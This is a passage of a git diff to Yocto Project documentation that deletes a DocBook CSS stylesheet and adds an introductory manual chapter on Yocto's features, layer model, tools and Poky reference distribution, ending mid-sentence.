- padding: 0em 0em 0em 0em;
-}
-
-ul li p {
- text-align: left;
-}
-
-table {
- width :100%;
-}
-
-th {
- padding: 0.25em;
- text-align: left;
- font-weight: normal;
- vertical-align: top;
-}
-
-td {
- padding: 0.25em;
- vertical-align: top;
-}
-
-p a[id] {
- margin: 0px;
- padding: 0px;
- display: inline;
- background-image: none;
-}
-
-a {
- text-decoration: underline;
- color: #444;
-}
-
-pre {
- overflow: auto;
-}
-
-a:hover {
- text-decoration: underline;
- /*font-weight: bold;*/
-}
-
-/* This style defines how the permalink character
- appears by itself and when hovered over with
- the mouse. */
-
-[alt='Permalink'] { color: #eee; }
-[alt='Permalink']:hover { color: black; }
-
-
-div.informalfigure,
-div.informalexample,
-div.informaltable,
-div.figure,
-div.table,
-div.example {
- margin: 1em 0em;
- padding: 1em;
- page-break-inside: avoid;
-}
-
-
-div.informalfigure p.title b,
-div.informalexample p.title b,
-div.informaltable p.title b,
-div.figure p.title b,
-div.example p.title b,
-div.table p.title b{
- padding-top: 0em;
- margin-top: 0em;
- font-size: 100%;
- font-weight: normal;
-}
-
-.mediaobject .caption,
-.mediaobject .caption p {
- text-align: center;
- font-size: 80%;
- padding-top: 0.5em;
- padding-bottom: 0.5em;
-}
-
-.epigraph {
- padding-left: 55%;
- margin-bottom: 1em;
-}
-
-.epigraph p {
- text-align: left;
-}
-
-.epigraph .quote {
- font-style: italic;
-}
-.epigraph .attribution {
- font-style: normal;
- text-align: right;
-}
-
-span.application {
- font-style: italic;
-}
-
-.programlisting {
- font-family: monospace;
- font-size: 80%;
- white-space: pre;
- margin: 1.33em 0em;
- padding: 1.33em;
-}
-
-.tip,
-.warning,
-.caution,
-.note {
- margin-top: 1em;
- margin-bottom: 1em;
-
-}
-
-/* force full width of table within div */
-.tip table,
-.warning table,
-.caution table,
-.note table {
- border: none;
- width: 100%;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- padding: 0.8em 0.0em 0.0em 0.0em;
- margin : 0em 0em 0em 0em;
-}
-
-.tip p,
-.warning p,
-.caution p,
-.note p {
- margin-top: 0.5em;
- margin-bottom: 0.5em;
- padding-right: 1em;
- text-align: left;
-}
-
-.acronym {
- text-transform: uppercase;
-}
-
-b.keycap,
-.keycap {
- padding: 0.09em 0.3em;
- margin: 0em;
-}
-
-.itemizedlist li {
- clear: none;
-}
-
-.filename {
- font-size: medium;
- font-family: Courier, monospace;
-}
-
-
-div.navheader, div.heading{
- position: absolute;
- left: 0em;
- top: 0em;
- width: 100%;
- background-color: #cdf;
- width: 100%;
-}
-
-div.navfooter, div.footing{
- position: fixed;
- left: 0em;
- bottom: 0em;
- background-color: #eee;
- width: 100%;
-}
-
-
-div.navheader td,
-div.navfooter td {
- font-size: 66%;
-}
-
-div.navheader table th {
- /*font-family: Georgia, Times, serif;*/
- /*font-size: x-large;*/
- font-size: 80%;
-}
-
-div.navheader table {
- border-left: 0em;
- border-right: 0em;
- border-top: 0em;
- width: 100%;
-}
-
-div.navfooter table {
- border-left: 0em;
- border-right: 0em;
- border-bottom: 0em;
- width: 100%;
-}
-
-div.navheader table td a,
-div.navfooter table td a {
- color: #777;
- text-decoration: none;
-}
-
-/* normal text in the footer */
-div.navfooter table td {
- color: black;
-}
-
-div.navheader table td a:visited,
-div.navfooter table td a:visited {
- color: #444;
-}
-
-
-/* links in header and footer */
-div.navheader table td a:hover,
-div.navfooter table td a:hover {
- text-decoration: underline;
- background-color: transparent;
- color: #33a;
-}
-
-div.navheader hr,
-div.navfooter hr {
- display: none;
-}
-
-
-.qandaset tr.question td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-
-.qandaset tr.answer td p {
- margin: 0em 0em 1em 0em;
- padding: 0em 0em 0em 0em;
-}
-.answer td {
- padding-bottom: 1.5em;
-}
-
-.emphasis {
- font-weight: bold;
-}
-
-
- /************* /
- / decorations /
-/ *************/
-
-.titlepage {
-}
-
-.part .title {
-}
-
-.subtitle {
- border: none;
-}
-
-/*
-h1 {
- border: none;
-}
-
-h2 {
- border-top: solid 0.2em;
- border-bottom: solid 0.06em;
-}
-
-h3 {
- border-top: 0em;
- border-bottom: solid 0.06em;
-}
-
-h4 {
- border: 0em;
- border-bottom: solid 0.06em;
-}
-
-h5 {
- border: 0em;
-}
-*/
-
-.programlisting {
- border: solid 1px;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example {
- border: 1px solid;
-}
-
-
-
-.tip,
-.warning,
-.caution,
-.note {
- border: 1px solid;
-}
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom: 1px solid;
-}
-
-.question td {
- border-top: 1px solid black;
-}
-
-.answer {
-}
-
-
-b.keycap,
-.keycap {
- border: 1px solid;
-}
-
-
-div.navheader, div.heading{
- border-bottom: 1px solid;
-}
-
-
-div.navfooter, div.footing{
- border-top: 1px solid;
-}
-
- /********* /
- / colors /
-/ *********/
-
-body {
- color: #333;
- background: white;
-}
-
-a {
- background: transparent;
-}
-
-a:hover {
- background-color: #dedede;
-}
-
-
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7,
-h8 {
- background-color: transparent;
-}
-
-hr {
- border-color: #aaa;
-}
-
-
-.tip, .warning, .caution, .note {
- border-color: #fff;
-}
-
-
-.tip table th,
-.warning table th,
-.caution table th,
-.note table th {
- border-bottom-color: #fff;
-}
-
-
-.warning {
- background-color: #f0f0f2;
-}
-
-.caution {
- background-color: #f0f0f2;
-}
-
-.tip {
- background-color: #f0f0f2;
-}
-
-.note {
- background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-.writernotes {
- color: red;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/overview-manual/overview-manual-yp-intro.rst b/documentation/overview-manual/overview-manual-yp-intro.rst
new file mode 100644
index 0000000000..2675074f14
--- /dev/null
+++ b/documentation/overview-manual/overview-manual-yp-intro.rst
@@ -0,0 +1,941 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************************
+Introducing the Yocto Project
+*****************************
+
+What is the Yocto Project?
+==========================
+
+The Yocto Project is an open source collaboration project that helps
+developers create custom Linux-based systems that are designed for
+embedded products regardless of the product's hardware architecture.
+Yocto Project provides a flexible toolset and a development environment
+that allows embedded device developers across the world to collaborate
+through shared technologies, software stacks, configurations, and best
+practices used to create these tailored Linux images.
+
+Thousands of developers worldwide have discovered that Yocto Project
+provides advantages in both systems and applications development,
+archival and management benefits, and customizations used for speed,
+footprint, and memory utilization. The project is a standard when it
+comes to delivering embedded software stacks. The project allows
+software customizations and build interchange for multiple hardware
+platforms as well as software stacks that can be maintained and scaled.
+
+.. image:: figures/key-dev-elements.png
+ :align: center
+
+For further introductory information on the Yocto Project, you might be
+interested in this
+`article <https://www.embedded.com/electronics-blogs/say-what-/4458600/Why-the-Yocto-Project-for-my-IoT-Project->`__
+by Drew Moseley and in this short introductory
+`video <https://www.youtube.com/watch?v=utZpKM7i5Z4>`__.
+
+The remainder of this section overviews advantages and challenges tied
+to the Yocto Project.
+
+.. _gs-features:
+
+Features
+--------
+
+The following list describes features and advantages of the Yocto
+Project:
+
+- *Widely Adopted Across the Industry:* Semiconductor, operating
+ system, software, and service vendors exist whose products and
+ services adopt and support the Yocto Project. For a look at the Yocto
+ Project community and the companies involved with the Yocto Project,
+ see the "COMMUNITY" and "ECOSYSTEM" tabs on the
+ :yocto_home:`Yocto Project <>` home page.
+
+- *Architecture Agnostic:* Yocto Project supports Intel, ARM, MIPS,
+ AMD, PPC and other architectures. Most ODMs, OSVs, and chip vendors
+ create and supply BSPs that support their hardware. If you have
+ custom silicon, you can create a BSP that supports that architecture.
+
+ Aside from lots of architecture support, the Yocto Project fully
+ supports a wide range of device emulation through the Quick EMUlator
+ (QEMU).
+
+- *Images and Code Transfer Easily:* Yocto Project output can easily
+ move between architectures without moving to new development
+ environments. Additionally, if you have used the Yocto Project to
+ create an image or application and you find yourself not able to
+ support it, commercial Linux vendors such as Wind River, Mentor
+ Graphics, Timesys, and ENEA could take it and provide ongoing
+ support. These vendors have offerings that are built using the Yocto
+ Project.
+
+- *Flexibility:* Corporations use the Yocto Project many different
+ ways. One example is to create an internal Linux distribution as a
+ code base the corporation can use across multiple product groups.
+ Through customization and layering, a project group can leverage the
+ base Linux distribution to create a distribution that works for their
+ product needs.
+
+- *Ideal for Constrained Embedded and IoT devices:* Unlike a full Linux
+ distribution, you can use the Yocto Project to create exactly what
+ you need for embedded devices. You only add the feature support or
+ packages that you absolutely need for the device. For devices that
+ have display hardware, you can use available system components such
+ as X11, GTK+, Qt, Clutter, and SDL (among others) to create a rich
+ user experience. For devices that do not have a display or where you
+ want to use alternative UI frameworks, you can choose to not install
+ these components.
+
+- *Comprehensive Toolchain Capabilities:* Toolchains for supported
+ architectures satisfy most use cases. However, if your hardware
+ supports features that are not part of a standard toolchain, you can
+ easily customize that toolchain through specification of
+ platform-specific tuning parameters. And, should you need to use a
+ third-party toolchain, mechanisms built into the Yocto Project allow
+ for that.
+
+- *Mechanism Rules Over Policy:* Focusing on mechanism rather than
+ policy ensures that you are free to set policies based on the needs
+ of your design instead of adopting decisions enforced by some system
+ software provider.
+
+- *Uses a Layer Model:* The Yocto Project `layer
+ infrastructure <#the-yocto-project-layer-model>`__ groups related
+ functionality into separate bundles. You can incrementally add these
+ grouped functionalities to your project as needed. Using layers to
+ isolate and group functionality reduces project complexity and
+ redundancy, allows you to easily extend the system, make
+ customizations, and keep functionality organized.
+
+- *Supports Partial Builds:* You can build and rebuild individual
+ packages as needed. Yocto Project accomplishes this through its
+ `shared-state cache <#shared-state-cache>`__ (sstate) scheme. Being
+ able to build and debug components individually eases project
+ development.
+
+- *Releases According to a Strict Schedule:* Major releases occur on a
+ :doc:`six-month cycle <../ref-manual/ref-release-process>`
+ predictably in October and April. The most recent two releases
+ support point releases to address common vulnerabilities and
+ exposures. This predictability is crucial for projects based on the
+ Yocto Project and allows development teams to plan activities.
+
+- *Rich Ecosystem of Individuals and Organizations:* For open source
+ projects, the value of community is very important. Support forums,
+ expertise, and active developers who continue to push the Yocto
+ Project forward are readily available.
+
+- *Binary Reproducibility:* The Yocto Project allows you to be very
+ specific about dependencies and achieves very high percentages of
+ binary reproducibility (e.g. 99.8% for ``core-image-minimal``). When
+ distributions are not specific about which packages are pulled in and
+ in what order to support dependencies, other build systems can
+ arbitrarily include packages.
+
+- *License Manifest:* The Yocto Project provides a :ref:`license
+ manifest <dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle>`
+ for review by people who need to track the use of open source
+ licenses (e.g. legal teams).
+
+.. _gs-challenges:
+
+Challenges
+----------
+
+The following list presents challenges you might encounter when
+developing using the Yocto Project:
+
+- *Steep Learning Curve:* The Yocto Project has a steep learning curve
+ and has many different ways to accomplish similar tasks. It can be
+ difficult to choose how to proceed when varying methods exist by
+ which to accomplish a given task.
+
+- *Understanding What Changes You Need to Make For Your Design Requires
+ Some Research:* Beyond the simple tutorial stage, understanding what
+ changes need to be made for your particular design can require a
+ significant amount of research and investigation. For information
+ that helps you transition from trying out the Yocto Project to using
+ it for your project, see the ":ref:`what-i-wish-id-known:what i wish i'd known about yocto project`" and
+ ":ref:`transitioning-to-a-custom-environment:transitioning to a custom environment for systems development`"
+ documents on the Yocto Project website.
+
+- *Project Workflow Could Be Confusing:* The `Yocto Project
+ workflow <#overview-development-environment>`__ could be confusing if
+ you are used to traditional desktop and server software development.
+ In a desktop development environment, mechanisms exist to easily pull
+ and install new packages, which are typically pre-compiled binaries
+ from servers accessible over the Internet. Using the Yocto Project,
+ you must modify your configuration and rebuild to add additional
+ packages.
+
+- *Working in a Cross-Build Environment Can Feel Unfamiliar:* When
+ developing code to run on a target, compilation, execution, and
+ testing done on the actual target can be faster than running a
+ BitBake build on a development host and then deploying binaries to
+ the target for test. While the Yocto Project does support development
+ tools on the target, the additional step of integrating your changes
+ back into the Yocto Project build environment would be required.
+ Yocto Project supports an intermediate approach that involves making
+ changes on the development system within the BitBake environment and
+ then deploying only the updated packages to the target.
+
+ The Yocto Project :term:`OpenEmbedded Build System`
+ produces packages
+ in standard formats (i.e. RPM, DEB, IPK, and TAR). You can deploy
+ these packages into the running system on the target by using
+ utilities on the target such as ``rpm`` or ``ipk``.
+
+- *Initial Build Times Can be Significant:* Long initial build times
+ are unfortunately unavoidable due to the large number of packages
+ initially built from scratch for a fully functioning Linux system.
+ Once that initial build is completed, however, the shared-state
+ (sstate) cache mechanism Yocto Project uses keeps the system from
+ rebuilding packages that have not been "touched" since the last
+ build. The sstate mechanism significantly reduces times for
+ successive builds.
+
+The Yocto Project Layer Model
+=============================
+
+The Yocto Project's "Layer Model" is a development model for embedded
+and IoT Linux creation that distinguishes the Yocto Project from other
+simple build systems. The Layer Model simultaneously supports
+collaboration and customization. Layers are repositories that contain
+related sets of instructions that tell the :term:`OpenEmbedded Build System`
+what to do. You can
+collaborate, share, and reuse layers.
+
+Layers can contain changes to previous instructions or settings at any
+time. This powerful override capability is what allows you to customize
+previously supplied collaborative or community layers to suit your
+product requirements.
+
+You use different layers to logically separate information in your
+build. As an example, you could have BSP, GUI, distro configuration,
+middleware, or application layers. Putting your entire build into one
+layer limits and complicates future customization and reuse. Isolating
+information into layers, on the other hand, helps simplify future
+customizations and reuse. You might find it tempting to keep everything
+in one layer when working on a single project. However, the more modular
+your Metadata, the easier it is to cope with future changes.
+
+.. note::
+
+ - Use Board Support Package (BSP) layers from silicon vendors when
+ possible.
+
+ - Familiarize yourself with the `Yocto Project curated layer
+ index <https://www.yoctoproject.org/software-overview/layers/>`__
+ or the `OpenEmbedded layer
+ index <http://layers.openembedded.org/layerindex/branch/master/layers/>`__.
+ The latter contains more layers but they are less universally
+ validated.
+
+ - Layers support the inclusion of technologies, hardware components,
+ and software components. The :ref:`Yocto Project
+ Compatible <dev-manual/dev-manual-common-tasks:making sure your layer is compatible with yocto project>`
+ designation provides a minimum level of standardization that
+ contributes to a strong ecosystem. "YP Compatible" is applied to
+ appropriate products and software components such as BSPs, other
+ OE-compatible layers, and related open-source projects, allowing
+ the producer to use Yocto Project badges and branding assets.
+
+To illustrate how layers are used to keep things modular, consider
+machine customizations. These types of customizations typically reside
+in a special layer, rather than a general layer, called a BSP Layer.
+Furthermore, the machine customizations should be isolated from recipes
+and Metadata that support a new GUI environment, for example. This
+situation gives you a couple of layers: one for the machine
+configurations, and one for the GUI environment. It is important to
+understand, however, that the BSP layer can still make machine-specific
+additions to recipes within the GUI environment layer without polluting
+the GUI layer itself with those machine-specific changes. You can
+accomplish this through a recipe that is a BitBake append
+(``.bbappend``) file, which is described later in this section.
+
+.. note::
+
+ For general information on BSP layer structure, see the
+ :doc:`../bsp-guide/bsp-guide`
+ .
+
+The :term:`Source Directory`
+contains both general layers and BSP layers right out of the box. You
+can easily identify layers that ship with a Yocto Project release in the
+Source Directory by their names. Layers typically have names that begin
+with the string ``meta-``.
+
+.. note::
+
+ It is not a requirement that a layer name begin with the prefix
+ meta-
+ , but it is a commonly accepted standard in the Yocto Project
+ community.
+
+For example, if you were to examine the :yocto_git:`tree
+view </cgit/cgit.cgi/poky/tree/>` of the
+``poky`` repository, you will see several layers: ``meta``,
+``meta-skeleton``, ``meta-selftest``, ``meta-poky``, and
+``meta-yocto-bsp``. Each of these repositories represents a distinct
+layer.
+
+For procedures on how to create layers, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual.
+
+Components and Tools
+====================
+
+The Yocto Project employs a collection of components and tools used by
+the project itself, by project developers, and by those using the Yocto
+Project. These components and tools are open source projects and
+metadata that are separate from the reference distribution
+(:term:`Poky`) and the
+:term:`OpenEmbedded Build System`. Most of the
+components and tools are downloaded separately.
+
+This section provides brief overviews of the components and tools
+associated with the Yocto Project.
+
+.. _gs-development-tools:
+
+Development Tools
+-----------------
+
+The following list consists of tools that help you develop images and
+applications using the Yocto Project:
+
+- *CROPS:* `CROPS <https://github.com/crops/poky-container/>`__ is an
+ open source, cross-platform development framework that leverages
+ `Docker Containers <https://www.docker.com/>`__. CROPS provides an
+ easily managed, extensible environment that allows you to build
+ binaries for a variety of architectures on Windows, Linux and Mac OS
+ X hosts.
+
+- *devtool:* This command-line tool is available as part of the
+ extensible SDK (eSDK) and is its cornerstone. You can use ``devtool``
+ to help build, test, and package software within the eSDK. You can
+ use the tool to optionally integrate what you build into an image
+ built by the OpenEmbedded build system.
+
+ The ``devtool`` command employs a number of sub-commands that allow
+ you to add, modify, and upgrade recipes. As with the OpenEmbedded
+ build system, "recipes" represent software packages within
+ ``devtool``. When you use ``devtool add``, a recipe is automatically
+ created. When you use ``devtool modify``, the specified existing
+ recipe is used in order to determine where to get the source code and
+ how to patch it. In both cases, an environment is set up so that when
+ you build the recipe a source tree that is under your control is used
+ in order to allow you to make changes to the source as desired. By
+ default, both new recipes and the source go into a "workspace"
+ directory under the eSDK. The ``devtool upgrade`` command updates an
+ existing recipe so that you can build it for an updated set of source
+ files.
+
+ You can read about the ``devtool`` workflow in the Yocto Project
+ Application Development and Extensible Software Development Kit
+ (eSDK) Manual in the
+ ":ref:`sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk workflow`"
+ section.
+
+- *Extensible Software Development Kit (eSDK):* The eSDK provides a
+ cross-development toolchain and libraries tailored to the contents of
+ a specific image. The eSDK makes it easy to add new applications and
+ libraries to an image, modify the source for an existing component,
+ test changes on the target hardware, and integrate into the rest of
+ the OpenEmbedded build system. The eSDK gives you a toolchain
+ experience supplemented with the powerful set of ``devtool`` commands
+ tailored for the Yocto Project environment.
+
+ For information on the eSDK, see the :doc:`../sdk-manual/sdk-manual` Manual.
+
+- *Toaster:* Toaster is a web interface to the Yocto Project
+ OpenEmbedded build system. Toaster allows you to configure, run, and
+ view information about builds. For information on Toaster, see the
+ :doc:`../toaster-manual/toaster-manual`.
+
+.. _gs-production-tools:
+
+Production Tools
+----------------
+
+The following list consists of tools that help production related
+activities using the Yocto Project:
+
+- *Auto Upgrade Helper:* This utility when used in conjunction with the
+ :term:`OpenEmbedded Build System`
+ (BitBake and
+ OE-Core) automatically generates upgrades for recipes that are based
+ on new versions of the recipes published upstream. See
+ :ref:`dev-manual/dev-manual-common-tasks:using the auto upgrade helper (auh)`
+ for how to set it up.
+
+- *Recipe Reporting System:* The Recipe Reporting System tracks recipe
+ versions available for Yocto Project. The main purpose of the system
+ is to help you manage the recipes you maintain and to offer a dynamic
+ overview of the project. The Recipe Reporting System is built on top
+ of the `OpenEmbedded Layer
+ Index <http://layers.openembedded.org/layerindex/layers/>`__, which
+ is a website that indexes OpenEmbedded-Core layers.
+
+- *Patchwork:* `Patchwork <https://patchwork.yoctoproject.org/>`__
+ is a fork of a project originally started by
+ `OzLabs <http://ozlabs.org/>`__. The project is a web-based tracking
+ system designed to streamline the process of bringing contributions
+ into a project. The Yocto Project uses Patchwork as an organizational
+ tool to handle patches, which number in the thousands for every
+ release.
+
+- *AutoBuilder:* AutoBuilder is a project that automates build tests
+ and quality assurance (QA). By using the public AutoBuilder, anyone
+ can determine the status of the current "master" branch of Poky.
+
+ .. note::
+
+ AutoBuilder is based on buildbot.
+
+ A goal of the Yocto Project is to lead the open source industry with
+ a project that automates testing and QA procedures. In doing so, the
+ project encourages a development community that publishes QA and test
+ plans, publicly demonstrates QA and test plans, and encourages
+ development of tools that automate and test and QA procedures for the
+ benefit of the development community.
+
+ You can learn more about the AutoBuilder used by the Yocto Project
+ Autobuilder `here <&YOCTO_AB_URL;>`__.
+
+- *Cross-Prelink:* Prelinking is the process of pre-computing the load
+ addresses and link tables generated by the dynamic linker as compared
+ to doing this at runtime. Doing this ahead of time results in
+ performance improvements when the application is launched and reduced
+ memory usage for libraries shared by many applications.
+
+ Historically, cross-prelink is a variant of prelink, which was
+ conceived by `Jakub
+ Jelínek <http://people.redhat.com/jakub/prelink.pdf>`__ a number of
+ years ago. Both prelink and cross-prelink are maintained in the same
+ repository albeit on separate branches. By providing an emulated
+ runtime dynamic linker (i.e. ``glibc``-derived ``ld.so`` emulation),
+ the cross-prelink project extends the prelink software's ability to
+ prelink a sysroot environment. Additionally, the cross-prelink
+ software enables the ability to work in sysroot style environments.
+
+ The dynamic linker determines standard load address calculations
+ based on a variety of factors such as mapping addresses, library
+ usage, and library function conflicts. The prelink tool uses this
+ information, from the dynamic linker, to determine unique load
+ addresses for executable and linkable format (ELF) binaries that are
+ shared libraries and dynamically linked. The prelink tool modifies
+ these ELF binaries with the pre-computed information. The result is
+ faster loading and often lower memory consumption because more of the
+ library code can be re-used from shared Copy-On-Write (COW) pages.
+
+ The original upstream prelink project only supports running prelink
+ on the end target device due to the reliance on the target device's
+ dynamic linker. This restriction causes issues when developing a
+ cross-compiled system. The cross-prelink adds a synthesized dynamic
+ loader that runs on the host, thus permitting cross-prelinking
+ without ever having to run on a read-write target filesystem.
+
+- *Pseudo:* Pseudo is the Yocto Project implementation of
+ `fakeroot <http://man.he.net/man1/fakeroot>`__, which is used to run
+ commands in an environment that seemingly has root privileges.
+
+ During a build, it can be necessary to perform operations that
+ require system administrator privileges. For example, file ownership
+ or permissions might need definition. Pseudo is a tool that you can
+ either use directly or through the environment variable
+ ``LD_PRELOAD``. Either method allows these operations to succeed as
+ if system administrator privileges exist even when they do not.
+
+ You can read more about Pseudo in the "`Fakeroot and
+ Pseudo <#fakeroot-and-pseudo>`__" section.
+
+.. _gs-openembedded-build-system:
+
+Open-Embedded Build System Components
+-------------------------------------
+
+The following list consists of components associated with the
+:term:`OpenEmbedded Build System`:
+
+- *BitBake:* BitBake is a core component of the Yocto Project and is
+ used by the OpenEmbedded build system to build images. While BitBake
+ is key to the build system, BitBake is maintained separately from the
+ Yocto Project.
+
+ BitBake is a generic task execution engine that allows shell and
+ Python tasks to be run efficiently and in parallel while working
+ within complex inter-task dependency constraints. In short, BitBake
+ is a build engine that works through recipes written in a specific
+ format in order to perform sets of tasks.
+
+ You can learn more about BitBake in the :doc:`BitBake User
+ Manual <bitbake:index>`.
+
+- *OpenEmbedded-Core:* OpenEmbedded-Core (OE-Core) is a common layer of
+ metadata (i.e. recipes, classes, and associated files) used by
+ OpenEmbedded-derived systems, which includes the Yocto Project. The
+ Yocto Project and the OpenEmbedded Project both maintain the
+ OpenEmbedded-Core. You can find the OE-Core metadata in the Yocto
+ Project :yocto_git:`Source Repositories </cgit/cgit.cgi/poky/tree/meta>`.
+
+ Historically, the Yocto Project integrated the OE-Core metadata
+ throughout the Yocto Project source repository reference system
+ (Poky). After Yocto Project Version 1.0, the Yocto Project and
+ OpenEmbedded agreed to work together and share a common core set of
+ metadata (OE-Core), which contained much of the functionality
+ previously found in Poky. This collaboration achieved a long-standing
+ OpenEmbedded objective for having a more tightly controlled and
+ quality-assured core. The results also fit well with the Yocto
+ Project objective of achieving a smaller number of fully featured
+ tools as compared to many different ones.
+
+ Sharing a core set of metadata results in Poky as an integration
+ layer on top of OE-Core. You can see that in this
+ `figure <#yp-key-dev-elements>`__. The Yocto Project combines various
+ components such as BitBake, OE-Core, script "glue", and documentation
+ for its build system.
+
+.. _gs-reference-distribution-poky:
+
+Reference Distribution (Poky)
+-----------------------------
+
+Poky is the Yocto Project reference distribution. It contains the
+:term:`OpenEmbedded Build System`
+(BitBake and OE-Core) as well as a set of metadata to get you started
+building your own distribution. See the
+`figure <#what-is-the-yocto-project>`__ in "What is the Yocto Project?"
+section for an illustration that shows Poky and its relationship with
+other parts of the Yocto Project.
+
+To use the Yocto Project tools and components, you can download
+(``clone``) Poky and use it to bootstrap your own distribution.
+
+.. note::
+
+ Poky does not contain binary files. It is a working example of how to
+ build your own custom Linux distribution from source.
+
+You can read more about Poky in the "`Reference Embedded Distribution
+(Poky) <#reference-embedded-distribution>`__" section.
+
+.. _gs-packages-for-finished-targets:
+
+Packages for Finished Targets
+-----------------------------
+
+The following lists components associated with packages for finished
+targets:
+
+- *Matchbox:* Matchbox is an Open Source, base environment for the X
+ Window System running on non-desktop, embedded platforms such as
+ handhelds, set-top boxes, kiosks, and anything else for which screen
+ space, input mechanisms, or system resources are limited.
+
+ Matchbox consists of a number of interchangeable and optional
+ applications that you can tailor to a specific, non-desktop platform
+ to enhance usability in constrained environments.
+
+ You can find the Matchbox source in the Yocto Project
+ :yocto_git:`Source Repositories <>`.
+
+- *Opkg:* Open PacKaGe management (opkg) is a lightweight package
+ management system based on the itsy package (ipkg) management system.
+ Opkg is written in C and resembles Advanced Package Tool (APT) and
+ Debian Package (dpkg) in operation.
+
+ Opkg is intended for use on embedded Linux devices and is used in
+ this capacity in the
+ `OpenEmbedded <http://www.openembedded.org/wiki/Main_Page>`__ and
+ `OpenWrt <https://openwrt.org/>`__ projects, as well as the Yocto
+ Project.
+
+ .. note::
+
+ As best it can, opkg maintains backwards compatibility with ipkg
+ and conforms to a subset of Debian's policy manual regarding
+ control files.
+
+ You can find the opkg source in the Yocto Project
+ :yocto_git:`Source Repositories <>`.
+
+.. _gs-archived-components:
+
+Archived Components
+-------------------
+
+The Build Appliance is a virtual machine image that enables you to build
+and boot a custom embedded Linux image with the Yocto Project using a
+non-Linux development system.
+
+Historically, the Build Appliance was the second of three methods by
+which you could use the Yocto Project on a system that was not native to
+Linux.
+
+1. *Hob:* Hob, which is now deprecated and is no longer available since
+ the 2.1 release of the Yocto Project provided a rudimentary,
+ GUI-based interface to the Yocto Project. Toaster has fully replaced
+ Hob.
+
+2. *Build Appliance:* Post Hob, the Build Appliance became available. It
